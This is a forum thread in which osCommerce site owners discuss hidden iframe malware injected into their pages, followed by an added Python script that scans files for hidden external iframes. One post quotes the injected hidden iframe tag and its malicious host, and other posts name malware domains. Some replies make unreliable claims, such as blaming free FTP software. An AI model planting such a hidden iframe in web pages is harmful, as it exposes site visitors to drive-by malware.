Iframe malware in osCommerce site
by rzc
about 1 year ago

Hi

I just found out (from customers and google) that our site was infected with inserted hidden iframes that linked to other sites.

Our site is a full osCommerce site.

It started yesterday, and on the same day, there was a purchase of some products, where the customer name etc. was just “asaaasasd” etc.

I have removed all wrong iframe tags in my files, but I would like to know how I could prevent this from happening again in the future, and how it could happen!?

Thanks!

by WeWatch
about 1 year ago

Without knowing what script was found or your site name, it’s impossible to tell how to prevent this or how it happened in the first place.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by rzc
about 1 year ago

Oh sorry.

Here is the report:
http://www.google.com/safebrowsing/diagnostic?site=www.ribezoocenter.dk

Malicious software is hosted on 2 domain(s), including durnosy.com/, openstats.info/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including durnosy.com/.

by WeWatch
about 1 year ago

The durnosy and openstats.info infections have usually been the result of compromised FTP credentials.

Here’s what we recommend:

1. Scan all PCs that have FTP access to your site with either AVG, Avast or Avira. These have been found to work best at cleaning this virus. For some reason, Norton has not been very successful at detecting or removing this virus.

2. Change your FTP password. This virus steals your FTP credentials either by searching your files for the stored username and password in the FTP software used or by sniffing the FTP traffic for username and password. Since FTP transmits in plain text, it’s easy to do.

3. Find out from your hosting provider how you can move away from FTP and move toward using either SFTP or FTPS for file transfers. These 2 protocols encrypt all transmissions so it’s much more difficult (some say impossible) to sniff the traffic.

Then when you upload files to your site, you should be good – after you’ve cleaned them. But typically, you won’t find the infectious files on your PC, they’re changed on your website.

Let the forum here know of your results or questions so that others may learn from your experience.

Thank you.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by rzc
about 1 year ago

I have scanned all computers with FTP access with no results. (With AVG and Kaspersky)

I just talked with our host, and they told me they have seen similar problems on other servers with php5 and mysql5. Now they will move us to a php5 and mysql5 server.

I have removed all tags in my files; should I look out for other things?

My host talked about a SQL injection that could cause this matter. (Which matches up with the customers named “asdasdasda” etc.)

by job_finder
about 1 year ago

The problem is FileZilla Client, I’m sure, since me and others have the same problem and we all use FileZilla Client.
This client is very bad because it’s free software.
So you should reinstall the code and change the FTP password.

by rzc
about 1 year ago

I use FileZilla FTP.

Which FTP client would you prefer instead?

by job_finder
about 1 year ago

CuteFTP Pro. Perfect program. Also, I prefer ZoneAlarm Security as antivirus and firewall. ZoneAlarm Security helped me to discover that iframe.

by phpfreek2007
about 1 year ago

Hi,

I’m new to the forum; however, I had the same issue 2 days ago. I again did the same thing: I removed the code, uninstalled CuteFTP, and scanned the PC.

It’s done for now, but I am not sure if it will not come again.

I am looking for the malware/badware or spyware name; this is very important in order to stop it coming next time.

I can’t trust CuteFTP now and I’m looking for SFTP installed to upload. Any help will be greatly appreciated.

Thanks in advance.

by phpfreek2007
about 1 year ago

Hi all,

I faced the same issue 2 days ago. I am using CuteFTP Pro and my 3 sites’ index pages were infected with the following code.

<iframe src=“http://a5f.ru:8080/ts/in.cgi?pepsi93” width=125 height=125 style=“visibility: hidden”>

Thankfully I found it and scanned my entire server for that code. I found 3 locations, where I edited the things.

Also, I updated the FTP password, scanned my PC, and uninstalled CuteFTP.

I am looking for the name of the badware/malware/spyware which caused this. Does anyone know the name, the exact reason why it came, and by which anti-spyware it was removed?

Please, if anyone has any details, pass them on so that we can apply them on our machines. Thanks very much in advance.

Sam
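
Added example, not part of any post in this thread: the posters describe searching their server for the injected tag by hand, and this Python sketch does the same search by pattern, reporting every iframe that points at a foreign host and is also hidden by style or shrunk to 0/1 pixel. The file extensions, the `own_hosts` allow-list and all hostnames in the sample files are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDING_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm", ".js", ".tpl"}  # assumed file types

def classify_iframe(tag, own_hosts):
    """Return the reasons an <iframe> tag looks injected; empty list if it does not."""
    attrs = {n.lower(): dq or sq or bare for n, dq, sq, bare in ATTR_RE.findall(tag)}
    host = (urlparse(attrs.get("src", "")).hostname or "").lower()
    if not host or host in own_hosts:
        return []  # relative or same-site frame: not reported
    hidden = [label for label, hit in (
        ("hidden by style", HIDING_RE.search(attrs.get("style", ""))),
        ("0/1 pixel size", {attrs.get("width"), attrs.get("height")} & {"0", "1"}),
    ) if hit]
    return ["external host " + host] + hidden if hidden else []

def scan_tree(root, own_hosts):
    """Return (relative path, line number, reasons) for each suspicious tag under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXTENSIONS:
            text = path.read_text(encoding="utf-8", errors="replace")  # whole file, so multi-line tags match
            for m in IFRAME_RE.finditer(text):
                reasons = classify_iframe(m.group(0), own_hosts)
                if reasons:
                    line = text.count("\n", 0, m.start()) + 1
                    findings.append((str(path.relative_to(root)), line, reasons))
    return findings

def demo():
    """Scan a throwaway tree of constructed sample files (not data from the thread)."""
    samples = {
        "index.php": '<?php echo "hi"; ?>\n<iframe src="http://bad.example.invalid:8080/x"\n'
                     ' width=125 height=125 style="visibility: hidden"></iframe>\n',
        "about.html": '<iframe src="https://maps.example.org/embed" width="400"></iframe>\n',
        "footer.php": "<iframe src='//bad.example.invalid/y' width=1 height=1></iframe>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            (Path(root) / name).write_text(body, encoding="utf-8")
        return scan_tree(root, own_hosts={"shop.example.org"})

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run against a downloaded copy of the web root, a hit gives the file and line to inspect; a clean result does not rule out injected code stored in the database or obfuscated in script.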
